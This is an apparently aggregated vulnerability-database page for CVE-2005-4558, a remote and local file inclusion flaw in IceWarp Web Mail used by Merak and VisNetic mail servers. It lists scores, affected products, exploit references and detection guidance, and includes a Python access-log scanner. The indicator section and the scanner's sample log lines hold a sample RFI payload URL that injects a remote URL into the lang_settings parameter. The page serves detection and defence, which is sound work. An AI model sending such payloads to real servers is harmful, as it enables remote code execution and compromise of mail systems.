CVE-2005-4558
Published 2005-12-28
CVE-2005-4558: IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for…
Priority P268 · medium · 6.5 (CVSS 2.0)
AV:N/AC:L/Au:S/C:P/I:P/A:P
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 8.33% (94.2th percentile)
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deerfield | visnetic_mail_server | — | — |
| deerfield | visnetic_mail_server | — | — |
| icewarp | web_mail | — | — |
| icewarp | web_mail | — | — |
| merak | mail_server | — | — |
| merak | mail_server | — | — |
Detection & IOCs
url: http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;
- Monitor HTTP requests to /mail/settings.html containing a manipulated 'language' parameter with non-standard values (e.g., URLs or path traversal strings), indicative of an LFI exploitation attempt.
- Monitor HTTP requests to /mail/index.html containing a 'lang_settings' parameter with array-style injection and semicolon-delimited remote URLs, indicative of an RFI exploitation attempt.
- Alert on lang_settings parameter values containing semicolons and external URLs (e.g., lang_settings[TEST]=test;http://[host]/;) in web server logs targeting IceWarp/Merak/VisNetic mail installations.
- This vulnerability was confirmed actively exploited in the wild as of July 2007; prioritize detection on any IceWarp WebMail 5.5.1, Merak 8.3.0r, or VisNetic 8.3.0 build 1 deployments.
- The vulnerability requires the attacker to be authenticated; unauthenticated exploitation is not directly described for the lang_settings/language parameter vectors.
- The malicious language value is stored in a database before being executed, meaning the injection may persist and trigger on subsequent requests rather than immediately; detection must account for stored/second-order execution.
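The monitoring points above can be expressed as a small access-log check. This is an added example, not a rule from any of the indexed sources; the log layout, the sample lines, the tag names and the definition of a "standard" language value (a short locale-like token) are assumptions.

```python
import re
from urllib.parse import unquote_plus

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_SCHEME = re.compile(r"(?:https?|ftp)://", re.I)
# Assumption: a legitimate language value is a short locale-like token.
SAFE_LANGUAGE = re.compile(r"^[A-Za-z]{2,3}(?:[_-][A-Za-z]{2})?$")

def params(query):
    """Split on '&' only, so a ';' stays inside the value being inspected."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name).lower(), unquote_plus(value)

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    path = unquote_plus(path).lower()
    findings = []
    for name, value in params(query):
        if path.endswith("/mail/index.html") and name.startswith("lang_settings"):
            if URL_SCHEME.search(value):
                tag = "lang_settings-url"
                findings.append(tag + "+semicolon" if ";" in value else tag)
        elif path.endswith("/mail/settings.html") and name == "language":
            # Only query strings are visible here; a POSTed value needs body logging.
            if not SAFE_LANGUAGE.match(value):
                findings.append("nonstandard-language")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample log lines (combined-log style), not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - alice [28/Dec/2005:10:01:02 +0000] "GET /mail/index.html?id=abc123 HTTP/1.1" 200 5120',
    '198.51.100.7 - alice [28/Dec/2005:10:01:09 +0000] "GET /mail/settings.html?id=abc123&language=en HTTP/1.1" 200 2048',
    '203.0.113.9 - bob [28/Dec/2005:10:04:11 +0000] "GET /mail/settings.html?id=def456&language=..%2F..%2Fx HTTP/1.1" 200 2048',
    '203.0.113.9 - bob [28/Dec/2005:10:04:15 +0000] "GET /mail/index.html?id=def456&lang_settings%5BTEST%5D=test;http://host.example/; HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, found)
```

Because the language value is stored before it is used, a hit on settings.html and the later request that triggers it can be separate log entries, so correlate findings per session or user rather than per request.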
CVSS provenance
nvd · v2.0 · 6.5 · MEDIUM · AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck · 6.5 · MEDIUM
GHSA
GHSA-q73x-2fc7-9qwp: IceWarp Web Mail 5
ghsa_unreviewed·2022-05-01
CVE-2005-4558 [MEDIUM] GHSA-q73x-2fc7-9qwp: IceWarp Web Mail 5
GHSA
GHSA-6fc2-x5pj-mq44: Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8
ghsa_unreviewed·2022-05-01·CVSS 6.5
CVE-2006-0818 [MEDIUM] GHSA-6fc2-x5pj-mq44: Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8
Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with IceWarp Web Mail before 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558.
VulnCheck
deerfield visnetic_mail_server Vulnerability
vulncheck·2005·CVSS 6.5
CVE-2005-4558 [MEDIUM] deerfield visnetic_mail_server Vulnerability
Affected: deerfield visnetic_mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.exploit-db.com/exploits/26982; https://www.exploit-db.com/exploits/26983
No detection rules found.
Exploit-DB
IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion
exploitdb·2005-12-27
---
source: https://www.securityfocus.com/bid/16069/info
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Additionally, an attacker can exploit these issues to obtain the contents of local files.
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
UPDAT
Exploit-DB
IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion
exploitdb·2005-12-27
---
source: https://www.securityfocus.com/bid/16069/info
No writeups or analysis indexed.
- http://marc.info/?l=full-disclosure&m=113570229524828&w=2
- http://secunia.com/advisories/17046
- http://secunia.com/advisories/17865
- http://secunia.com/secunia_research/2005-62/advisory/
- http://securitytracker.com/id?1015412
- http://www.osvdb.org/22080
- http://www.osvdb.org/22081
- http://www.securityfocus.com/archive/1/420255/100/0/threaded
- http://www.securityfocus.com/bid/16069
- https://exchange.xforce.ibmcloud.com/vulnerabilities/23904